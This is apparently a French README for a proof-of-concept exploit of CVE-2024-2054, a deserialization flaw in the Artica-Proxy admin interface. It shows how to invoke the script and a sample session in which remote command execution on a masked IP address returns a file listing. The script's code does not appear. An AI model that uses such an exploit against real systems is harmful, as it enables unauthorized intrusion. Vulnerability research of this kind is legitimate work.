
Exploit de preuve de concept pour CVE-2024-2054, démontrant une RCE par désérialisation non sécurisée dans l'application web administrative Artica-Proxy. Inclut l'exécution de commandes et la vérification de vulnérabilité.
Une preuve de concept d'exploitation pour l'application web administrative ARTICA PROXY CVE-2024-2054
Plus de détails ici : https://blog.sonicwall.com/en-us/2024/03/unpatched-php-deserialization-vulnerability-in-artica-proxy/
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
Cette POC a été créée purement à des fins de recherche académique et de développement de techniques défensives efficaces, et n'est pas destinée à être utilisée pour attaquer des systèmes sauf autorisation explicite. Les créateurs/mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel/POC. Utilisez de manière responsable.